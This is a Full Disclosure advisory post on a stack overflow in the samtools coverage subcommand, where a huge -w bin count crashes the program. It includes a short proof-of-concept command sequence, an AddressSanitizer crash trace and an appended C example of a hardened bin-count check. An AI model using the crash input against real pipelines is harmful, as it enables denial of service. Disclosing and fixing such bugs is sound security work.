
Full Disclosure mailing list archives
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 28 Sep 2025 12:13:48 -0400
In the samtools coverage subcommand, the -w / --n-bins option allows the user to specify how many "bins" to produce in the coverage histogram. The code computes:

    stats[tid].bin_width = (stats[tid].end - stats[tid].beg) / n_bins;

When the number of bins (n_bins) is extremely large relative to the region length (end - beg), this integer division can yield zero, or lead to unexpected behavior in subsequent arithmetic. Later in print_hist(), calculations involving current_bin, row_bin_size, and loop bounds can overflow or cause invalid branching, eventually leading to stack recursion or unbounded stack consumption. In practice, supplying a huge bin count (e.g. 2147483647) triggers a stack overflow in print_hist() (as observed) and crashes the program.

Impact:

- Denial of Service (DoS).
- Memory corruption.

PoC (Proof of Concept)

Create a minimal BAM with a large declared reference size and one read (the SAM header lines and the read record are separated with "\n" so that echo -e emits three records):

    echo -e "@HD\tVN:1.6\n@SQ\tSN:chrX\tLN:500000000\nr1\t0\tchrX\t1\t60\t10M\t*\t0\t0\tAAAAAAAAAA\tIIIIIIIIII" \
      | ./samtools view -b -o huge.bam -
    ./samtools index huge.bam

Run coverage with a massive bin count:

    ./samtools coverage -w 2147483647 huge.bam

Expected crash:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1070796==ERROR: AddressSanitizer: stack-overflow on address 0xfffef18a7ff0 (pc 0xab400a2993cc bp 0xffffdff5a910 sp 0xfffef18a7ff0 T0)
        #0 0xab400a2993cc in print_hist /root/samtools/coverage.c:236:22
        #1 0xab400a29c304 in main_coverage /root/samtools/coverage.c:674:13
        #2 0xab400a286044 in main /root/samtools/bamtk.c:271:55
        #3 0xff6004352290 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #4 0xff6004352374 in __libc_start_main csu/../csu/libc-start.c:360:3
        #5 0xab400a15cc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)

    SUMMARY: AddressSanitizer: stack-overflow /root/samtools/coverage.c:236:22 in print_hist
    ==1070796==ABORTING
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
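The integer-division edge case the report describes, as an added illustration that is not samtools code and not part of the original post: a stand-in naive_bin_width() mirrors the quoted (end - beg) / n_bins formula and shows the width truncating to 0 for the PoC's 500000000-base reference and -w 2147483647, and a hardened hardened_hist_init() clamps the bin count to both a caller-supplied cap and the region length before deriving the width, so bin_width is always at least 1 and any per-bin allocation a histogram printer makes stays bounded. The hist_t struct, the max_bins parameter, and all function names are assumptions made for this example.

```c
#include <stdio.h>

/* Added illustration, not samtools code. Stand-in for the histogram state
 * the advisory refers to (beg/end/n_bins/bin_width); field names assumed. */
typedef struct {
    long long beg, end;
    long long n_bins;
    long long bin_width;
} hist_t;

/* Naive width: mirrors the formula quoted in the advisory. Integer division
 * truncates to 0 as soon as n_bins exceeds the region length. */
long long naive_bin_width(long long beg, long long end, long long n_bins) {
    return (end - beg) / n_bins;
}

/* Bin index for a position under the naive width. A width of 0 would be a
 * divide-by-zero (or a loop that never advances) downstream, so return -1
 * rather than compute with it. */
long long naive_bin_index(const hist_t *h, long long pos) {
    if (h->bin_width <= 0) return -1;
    return (pos - h->beg) / h->bin_width;
}

/* Hardened initialisation: validate and clamp before deriving the width.
 * max_bins is an assumed caller-chosen cap bounding any per-bin allocation
 * (stack or heap) that the histogram printer later makes.
 * Returns 0 on success, -1 on invalid input. */
int hardened_hist_init(hist_t *h, long long beg, long long end,
                       long long n_bins, long long max_bins) {
    if (h == NULL || end <= beg || n_bins <= 0 || max_bins <= 0) return -1;
    long long len = end - beg;
    if (n_bins > max_bins) n_bins = max_bins;  /* bound resource use */
    if (n_bins > len) n_bins = len;            /* never more bins than bases */
    h->beg = beg;
    h->end = end;
    h->n_bins = n_bins;
    h->bin_width = len / n_bins;               /* guaranteed >= 1 */
    return 0;
}

/* Convenience wrappers returning the derived values (or -1 on rejection). */
long long hardened_n_bins(long long beg, long long end,
                          long long n_bins, long long max_bins) {
    hist_t h;
    return hardened_hist_init(&h, beg, end, n_bins, max_bins) == 0 ? h.n_bins : -1;
}

long long hardened_bin_width(long long beg, long long end,
                             long long n_bins, long long max_bins) {
    hist_t h;
    return hardened_hist_init(&h, beg, end, n_bins, max_bins) == 0 ? h.bin_width : -1;
}

int main(void) {
    /* Constructed input matching the PoC: 500000000-base reference, -w 2147483647. */
    long long beg = 0, end = 500000000, n_bins = 2147483647;
    hist_t h = { beg, end, n_bins, naive_bin_width(beg, end, n_bins) };
    printf("naive: bin_width=%lld, index(pos=10)=%lld\n",
           h.bin_width, naive_bin_index(&h, 10));
    if (hardened_hist_init(&h, beg, end, n_bins, 4096) == 0)
        printf("hardened: n_bins=%lld, bin_width=%lld\n", h.n_bins, h.bin_width);
    return 0;
}
```

Clamping is one valid policy; rejecting the request with an error is another. The property that matters for the crash class described above is that n_bins is bounded before anything is sized from it and that bin_width can never be 0 when later arithmetic divides by it or steps by it.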